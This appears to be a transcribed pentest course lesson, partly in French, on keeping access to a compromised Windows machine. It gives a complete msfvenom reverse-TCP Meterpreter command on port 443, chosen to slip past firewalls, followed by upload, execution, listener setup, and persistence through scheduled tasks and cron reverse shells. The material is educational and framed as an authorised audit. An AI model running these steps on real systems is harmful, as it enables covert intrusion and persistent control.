Maintaining access on the victim machine
Jusqu'à présent, nous avons réussi à pénétrer le serveur distant en exploitant une vulnérabilité critique sur le système d'exploitation.
Maintenant, nous pouvons poursuivre notre test d'intrusion, mais il faut être vigilant.
Dans certains cas, vous risquez de perdre votre session Meterpreter (par exemple, si le système redémarre ou si la connexion réseau est instable), ce qui perturberait la continuité de votre audit.
C'est pour cette raison que nous devons mettre en place un maintien d'accès sur le serveur, en générant plusieurs sessions Meterpreter ou d'autres shells distants.
There are several strategies for this.
We will study one consisting of uploading (uploading) a malicious executable file to the remote server to open a new Meterpreter session, which increases our chances of keeping our access on the machine.
We will also see other techniques to make this access persistent.
If we execute the `sessions` command on Metasploit, we can see that we currently have only one active session on the target server.
It runs on the computer named "John-PC", and we can view the associated IP address and ports.
To interact with this session, we use the command `sessions -i 1` (where 1 is the session identifier).
This gives us control back over our Meterpreter console.
This is our starting point: making sure our first session is working properly.
In another terminal, we are going to create our malicious payload using the `msfvenom` tool, which is part of the Metasploit framework and allows generating custom payloads.
Here is the complete command: `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_Kali> LPORT=443 -f exe -o persistence.exe`.
Let's break down this command: the `-p` option specifies the payload, here a Meterpreter reverse TCP for Windows 64-bit architecture.
With a "reverse TCP" type connection, it is the victim machine that will initiate the network connection to the attacker's machine.
Conversely, in a "bind" mode, it is the attacker who tries to connect directly to an open port on the target machine.
We almost always prefer the reverse mode because it allows bypassing firewalls that generally block incoming connections but allow outgoing connections.
The `LHOST` parameter corresponds to the IP address of our Kali Linux attack machine.
For `LPORT`, we choose port 443.
Port 443 is used by default for HTTPS traffic.
It is almost always authorized by company firewalls to allow users to surf the web securely.
Thus, our malicious flow will go unnoticed.
The `-f` option defines the output format (here a `.exe` executable for Windows, but we can generate `.dll` formats or other types depending on the target).
Finally, the `-o` option allows specifying the name of the generated file, for example `persistence.exe`.
We press Enter and `msfvenom` generates the file.
Back in our control terminal, we can verify our current working directory with `pwd` (we are in `/home/kali`).
On our Meterpreter console, we can verify our local folder (on our attack machine) using the `lpwd` command to make sure we are in the same folder where our `persistence.exe` file is located.
To transfer this file to the victim machine, we use the command `upload persistence.exe`.
The file is uploaded.
By typing `ls` on Meterpreter, we find that the `persistence.exe` file is now present on the victim's hard drive.
Before executing it, we must configure a listener on Metasploit.
Indeed, when the target executes the file, it will attempt to connect to our Kali machine on port 443, and our system must be ready to intercept this connection.
To do this, we launch a new terminal with `msfconsole`, then we use the multi handler module by typing `use exploit/multi/handler`.
We must configure the same payload as the one used to generate the executable by typing `set payload windows/x64/meterpreter/reverse_tcp`.
By typing `show options`, we can configure the listening IP address (`LHOST`) and the port (`LPORT`).
If you work on a local network or a personal lab, you will fill in the IP address of your `eth0` or `wlan0` interface.
If you use a VPN network (like TryHackMe), you will have to specify the address of your VPN interface (`tun0`).
We configure the port to 443 by typing `set LPORT 443`.
We launch the listener with the command `exploit -j` (or `run -j`) to run it in the background.
Now that our listener is ready on port 443, we return to our first Meterpreter session and launch the executable with the command `execute -f persistence.exe`.
This command creates a new process (for example under ID 2396) on the victim machine.
Almost immediately, on our listening terminal, we see a new Meterpreter session open.
If we put this session in the background with the command `background` and type `sessions`, we now see two active sessions on the target.
We thus have several access paths to our victim machine.
However, be careful not to multiply sessions unnecessarily to avoid triggering security alerts on your client's network.
To go further in maintaining access on Windows, attackers frequently use the Task Scheduler.
The Task Scheduler allows scheduling the automatic launch of programs or scripts at regular intervals or during specific events (like starting the machine).
For example, the installation of some browsers (like Opera GX) creates a scheduled task to automatically check for updates in the background transparently.
An attacker can create a similar task to launch their malicious executable file every 12 or 24 hours.
Thus, even if the server restarts or if the session is cut off, the scheduled task will automatically re-establish the reverse connection to the attacker's machine.
On Linux systems, the equivalent of the Windows Task Scheduler is the `cron` service (or cron daemon).
To configure scheduled tasks on Linux, we modify the `crontab` file (for example with the command `crontab -e` or by displaying its content with `cat /etc/crontab`).
This service allows scheduling scripts by specifying precisely the minute, hour, day of the month, month and day of the week.
An attacker can insert a command there to run a reverse shell regularly.
These are the fundamental strategies used to ensure maintaining access on a compromised system, whether it is Windows or Linux.